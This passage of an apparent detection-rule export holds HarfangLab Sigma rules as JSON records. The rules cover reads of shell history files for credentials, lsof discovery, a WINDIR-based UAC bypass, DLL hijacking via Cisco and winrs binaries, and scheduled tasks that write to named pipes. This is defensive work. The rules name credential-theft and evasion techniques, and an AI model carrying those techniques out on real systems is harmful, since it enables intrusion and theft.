'/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: 
'/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: 
'/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_rider_jetbrains:\n Image:\n - '/Users/*/Applications/Rider*.app/Contents/MacOS/rider'\n - /Applications/Rider*.app/Contents/MacOS/rider\n\n exclusion_cp_shell_sessions:\n Image: '/bin/cp'\n ProcessCommandLine:\n - '/bin/cp /Users/*/.zsh_history /Users/*/.zsh_sessions/*.history'\n - '/bin/cp /Users/*/.bash_history /Users/*/.bash_sessions/*.history'\n\n exclusion_tail_zsh:\n ProcessParentImage: '/bin/zsh'\n ProcessParentCommandLine:\n - '-zsh'\n - '/bin/zsh -il'\n ProcessCommandLine: 'tail -n100 /Users/*/.zsh_history'\n\n exclusion_adobe:\n Image: '/Applications/Adobe Bridge ????/Adobe Bridge ????.app/Contents/MacOS/Adobe Bridge *'\n\n exclusion_phpstorm:\n Image: '/Users/*/Applications/PhpStorm.app/Contents/MacOS/phpstorm'\n\n exclusion_texteditor:\n Image:\n - '/opt/homebrew/Cellar/emacs/*/bin/emacs-*'\n - '/usr/bin/vim'\n\n exclusion_jetbrains:\n ProcessSigned: 'true'\n 
ProcessSignatureSigningId|startswith: 'com.jetbrains.'\n\n exclusion_memory_cleaner:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.nektony.Memory-Cleaner-SIII'\n\n exclusion_superfile:\n Image: '/opt/homebrew/Cellar/superfile/*/bin/spf'\n\n exclusion_text_editor:\n Image: '/System/Applications/TextEdit.app/Contents/MacOS/TextEdit'\n\n exclusion_copy:\n Image: '/bin/cp'\n ProcessSignatureSigningId: 'com.apple.cp'\n ProcessSigned: 'true'\n\n exclusion_r:\n Image: '/Applications/R.app/Contents/MacOS/R'\n ProcessSignatureSigningId: 'org.R-project.R'\n ProcessSigned: 'true'\n\n exclusion_paloalto:\n Image: '/Library/Application Support/PaloAltoNetworks/Traps/bin/pmd'\n ProcessSignatureSigningId: 'pmd'\n ProcessSigned: 'true'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7dfd0c62-de07-4ea0-a8e7-2abe922f07b1",
"rule_name": "Shell History File Read (macOS)",
"rule_description": "Detects an attempt to read any of the common shell history files.\nThose files contain the most recent commands executed by the user and can be used by an attacker to look for unsecured credentials.\nIt is recommended to verify that the process performing the read operation has a legitimate reason to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7e00d26e-2a2d-476a-a23e-27322ed7ad2c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.548171Z",
"creation_date": "2026-03-23T11:45:34.095044Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095048Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man8/lsof.8.html",
"https://attack.mitre.org/techniques/T1049/"
],
"name": "t1049_lsof_linux.yml",
"content": "title: Currently Open Files Listed via Lsof (Linux)\nid: 7e00d26e-2a2d-476a-a23e-27322ed7ad2c\ndescription: |\n Detects the execution of the lsof utility to list all opened files on the system, especially files representing active network connections.\n Attackers may use it during discovery phase to discover remote systems.\n It is recommended to monitor the patterns used with lsof and investigate other discovery alerts to determine if this is malicious activity.\nreferences:\n - https://man7.org/linux/man-pages/man8/lsof.8.html\n - https://attack.mitre.org/techniques/T1049/\ndate: 2022/12/23\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/lsof'\n CommandLine:\n - 'lsof'\n - 'lsof -i'\n # Filter-out missing parents\n ParentImage|contains: '?'\n\n exclusion_commandline:\n ParentCommandLine|startswith:\n - '/bin/sh -c lsof | awk '\n - 'sh -c lsof 2>/dev/null | grep /home/'\n - '/bin/ksh /opt/tomcat/*.ksh '\n - '/bin/bash /opt/tomcat/*.ksh '\n - '/bin/bash /tmp/apache/*.ksh '\n - '/bin/ksh /opt/apache/*.ksh '\n - '/bin/bash /opt/apache/*.ksh '\n\n exclusion_insights:\n ParentImage: '/usr/bin/timeout'\n GrandparentCommandLine:\n - '/usr/bin/python /bin/redhat-access-insights --quiet'\n - 'python -m insights.tools.cat --no-header httpd_on_nfs'\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py --retry 3'\n\n exclusion_nuagent:\n ParentImage: '/opt/ds_agent/nuagent/ds_nuagent'\n\n exclusion_rapid7:\n ParentCommandLine|startswith: \"/bin/bash -c echo 'Rapid7Echo'; (LANG=C;LANGUAGE=\"\n\n # https://github.com/ansible/awx\n exclusion_ansibleawx:\n User: 'ansibleawx'\n GrandparentCommandLine: 'sshd: ansibleawx@notty'\n\n # template_exclusion_ansible:\n\n exclusion_ansible_current_directory:\n 
CurrentDirectory:\n - '/home/ansible/'\n - '/root/.ansible/tmp/'\n\n exclusion_qualys:\n Ancestors|contains:\n - '|/usr/local/qualys/cloud-agent/bin/qualys-scan-util|'\n - '|/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent|'\n\n exclusion_udascan:\n GrandparentImage: '/opt/microfocus/Discovery/.discagnt/udscan'\n\n exclusion_mdatp:\n - User: 'mdatp'\n CurrentDirectory: '/opt/microsoft/mdatp/sbin/'\n - ParentImage: '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - ParentCommandLine|contains: '/opt/microsoft/mdatp/conf/scripts/open_files.py'\n - GrandparentImage: '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - GrandparentCommandLine|contains: '/opt/microsoft/mdatp/conf/scripts/open_files.py'\n\n exclusion_oracle_ahf_tfa:\n ParentImage: '/opt/oracle.ahf/jre/bin/java'\n ParentCommandLine|contains: 'oracle.rat.tfa.TFAMain /opt/oracle.ahf/tfa'\n\n exclusion_oracle_diagsnap:\n ParentImage:\n - '/usr/bin/bash'\n - '/bin/sh'\n # /u01/app/grid/19.9.0.0/perl/bin/perl /u01/app/grid/19.9.0.0/bin/diagsnap.pl start\n GrandparentImage|endswith: '/perl/bin/perl'\n GrandparentCommandLine|contains: '/bin/diagsnap.pl'\n\n exclusion_lynis:\n ParentCommandLine:\n - '/bin/sh ./lynis audit system'\n - '/bin/sh /usr/bin/lynis audit system --cronjob'\n - '/bin/sh /usr/sbin/lynis --quick --no-colors*'\n\n exclusion_insights_client:\n - ParentCommandLine|startswith:\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py '\n - '/usr/bin/python /usr/lib/python*/site-packages/insights_client/run.py '\n - GrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py '\n - '/usr/bin/python /usr/lib/python*/site-packages/insights_client/run.py '\n\n exclusion_sosreport:\n - GrandparentCommandLine: '/usr/bin/python /usr/sbin/sosreport'\n - GrandparentCommandLine|startswith: '/usr/bin/python /usr/sbin/sosreport '\n\n exclusion_rkhunter:\n - ProcessParentCommandLine|contains:\n - '/usr/bin/rkhunter '\n - '/bin/sh 
/etc/cron.daily/rkhunter'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/rkhunter '\n\n exclusion_fsecure:\n - ProcessParentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n\n exclusion_ninjarmmagent:\n ProcessParentImage: '/opt/ninjarmmagent/programfiles/ninjarmm-linagent'\n\n exclusion_manageengine:\n ParentImage:\n - '/usr/local/manageengine/uems_agent/bin/dcconfig'\n - '/usr/local/manageengine/uems_agent/bin/dcpatchscan'\n\n exclusion_zabbix:\n - Ancestors|contains: '/usr/sbin/zabbix_agentd'\n - GrandparentImage: '/usr/sbin/zabbix_agent2'\n\n exclusion_veeam:\n ParentImage:\n - '/opt/veeam/transport/veeamtransport'\n - '/opt/veeam/deployment/veeamdeploymentsvc'\n\n exclusion_veritas:\n Ancestors|contains: '|/opt/VRTSvcs/bin/Application/ApplicationAgent|'\n\n exclusion_jumpcloud:\n ParentImage: '/opt/jc/bin/jumpcloud-agent'\n\n exclusion_xymon:\n Ancestors|contains: '|/usr/lib/xymon/client/bin/xymonlaunch|'\n\n exclusion_munin:\n GrandparentCommandLine|startswith: '/usr/bin/perl -w /etc/munin/plugins/'\n\n exclusion_nagios:\n Ancestors|contains:\n - '|/usr/sbin/nrpe|'\n - '|/opt/nagiosagent/*/perl/bin/perl|'\n\n exclusion_bladelogic:\n ProcessGrandparentImage:\n - '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n - '/opt/bladelogic/*/NSH/bin/rscd_full'\n\n exclusion_cursor:\n Ancestors|contains: '|/tmp/.mount_Cursor*/usr/share/cursor/cursor|/'\n\n exclusion_container:\n Ancestors|contains: '|/usr/bin/containerd-shim-runc-v2|'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7e00d26e-2a2d-476a-a23e-27322ed7ad2c",
"rule_name": "Currently Open Files Listed via Lsof (Linux)",
"rule_description": "Detects the execution of the lsof utility to list all open files on the system, especially files representing active network connections.\nAttackers may use it during the discovery phase to discover remote systems.\nIt is recommended to monitor the patterns used with lsof and investigate other discovery alerts to determine whether this is malicious activity.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-03-20",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7e0790b6-dbc2-4252-bd87-d553bb718f71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610260Z",
"creation_date": "2026-03-23T11:45:34.610263Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610270Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/"
],
"name": "t1548_windir_environment_variable_modification.yml",
"content": "title: WINDIR User Environment Variable Modified\nid: 7e0790b6-dbc2-4252-bd87-d553bb718f71\ndescription: |\n Detects the modification of the WINDIR user environment variable.\n The WINDIR environment variable is not defined by default in the user environment variables.\n The modification of this variable can be related to a UAC bypass using the DiskCleanup scheduled task.\n It is recommended to investigate the process that changed the value, as well as its parent for any suspicious activity.\nreferences:\n - https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/\ndate: 2020/10/09\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject: 'HKU\\\\*\\Environment\\windir'\n\n filter_empty:\n Details: '(Empty)'\n\n filter_windows:\n Details: '?:\\WINDOWS'\n\n selection_rename:\n EventType: 'RenameKey'\n NewName: 'HKU\\\\*\\Environment\\windir'\n\n condition: (selection_set_value and not 1 of filter_*) or selection_rename\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7e0790b6-dbc2-4252-bd87-d553bb718f71",
"rule_name": "WINDIR User Environment Variable Modified",
"rule_description": "Detects the modification of the WINDIR user environment variable.\nThe WINDIR environment variable is not defined by default in the user environment variables.\nThe modification of this variable can be related to a UAC bypass using the DiskCleanup scheduled task.\nIt is recommended to investigate the process that changed the value, as well as its parent for any suspicious activity.\n",
"rule_creation_date": "2020-10-09",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7e1dd922-2be2-484d-b721-57f2d4be98dd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589123Z",
"creation_date": "2026-03-23T11:45:34.589127Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589134Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ciscocollabhost.yml",
"content": "title: DLL Hijacking via ciscocollabhost.exe\nid: 7e1dd922-2be2-484d-b721-57f2d4be98dd\ndescription: |\n Detects potential Windows DLL Hijacking via ciscocollabhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/09\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CiscoCollabHost.exe'\n ProcessSignature: 'Cisco Systems, Inc.'\n ImageLoaded|endswith: '\\ciscosparklauncher.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Cisco Spark\\'\n - '?:\\Program Files\\Cisco Spark\\'\n - '?:\\Program Files (x86)\\Cisco Spark\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Cisco Spark\\'\n - '?:\\Program Files\\Cisco Spark\\'\n - '?:\\Program Files (x86)\\Cisco Spark\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Cisco Systems, Inc.'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7e1dd922-2be2-484d-b721-57f2d4be98dd",
"rule_name": "DLL Hijacking via ciscocollabhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ciscocollabhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-09",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7e34add6-fb2b-4c0f-b6f2-e76d5930ab5a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599940Z",
"creation_date": "2026-03-23T11:45:34.599943Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599951Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_winrs.yml",
"content": "title: DLL Hijacking via winrs.exe\nid: 7e34add6-fb2b-4c0f-b6f2-e76d5930ab5a\ndescription: |\n Detects potential Windows DLL Hijacking via winrs.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'winrs.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DSROLE.dll'\n - '\\mi.dll'\n - '\\miutils.dll'\n - '\\wsmsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7e34add6-fb2b-4c0f-b6f2-e76d5930ab5a",
"rule_name": "DLL Hijacking via winrs.exe",
"rule_description": "Detects potential Windows DLL Hijacking via winrs.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nThe rule fires when a Microsoft-signed winrs.exe loads DSROLE.dll, mi.dll, miutils.dll or wsmsvc.dll; loads where the process or the DLL resides under System32, SysWOW64 or WinSxS, or where the loaded DLL carries a valid Microsoft Windows signature, are excluded.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7e47bfec-3c33-40d7-8d74-c89094ba1371",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625535Z",
"creation_date": "2026-03-23T11:45:34.625537Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625541Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/005/",
"https://attack.mitre.org/techniques/T1059/003/"
],
"name": "t1053_scheduled_task_pipe_commandline.yml",
"content": "title: Scheduled Task with Named Pipe in Action Created\nid: 7e47bfec-3c33-40d7-8d74-c89094ba1371\ndescription: |\n Detects a scheduled task being created with one of the actions outputting to a named pipe.\n It is common for attackers to create a scheduled task that launches a script or command that sends its output to a named pipe. This allows attackers to evade defenses by decorrelating usual parent-child relationships to make analysis harder.\n It is recommended to investigate the process that created the scheduled task and the scheduled task itself as well as any spawned processes to determine if they are legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1053/005/\n - https://attack.mitre.org/techniques/T1059/003/\ndate: 2025/12/16\nmodified: 2025/12/22\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1053.005\n - attack.execution\n - attack.t1059.003\n - attack.t1159\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection:\n OperationType:\n - 'create'\n - 'update'\n FirstActionCommandLine|contains: '\\pipe\\'\n\n exclusion_ms_restart_manager:\n FirstActionCommandLine|contains|all:\n - '?:\\Windows\\system32\\rmclient.exe'\n - '\\pipe\\RestartManager-{????????-????-????-????-????????????}'\n\n exclusion_mssql_query:\n FirstActionCommandLine|contains|all:\n - '\\Microsoft SQL Server\\SQLCMD\\SQLCMD.exe'\n - '-S \\\\.\\pipe\\Microsoft##WID\\tsql\\query'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7e47bfec-3c33-40d7-8d74-c89094ba1371",
"rule_name": "Scheduled Task with Named Pipe in Action Created",
"rule_description": "Detects a scheduled task being created or updated whose first action command line references a named pipe path (\\pipe\\).\nIt is common for attackers to create a scheduled task that launches a script or command that sends its output to a named pipe. This allows attackers to evade defenses by breaking the usual parent-child process relationship, making analysis harder.\nKnown benign uses by the Windows Restart Manager (rmclient.exe) and by SQLCMD querying the Windows Internal Database pipe are excluded.\nIt is recommended to investigate the process that created the scheduled task and the scheduled task itself as well as any spawned processes to determine if they are legitimate.\n",
"rule_creation_date": "2025-12-16",
"rule_modified_date": "2025-12-22",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1059.003",
"attack.t1159"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7ee4cf79-a255-401f-9014-daf70499ceee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
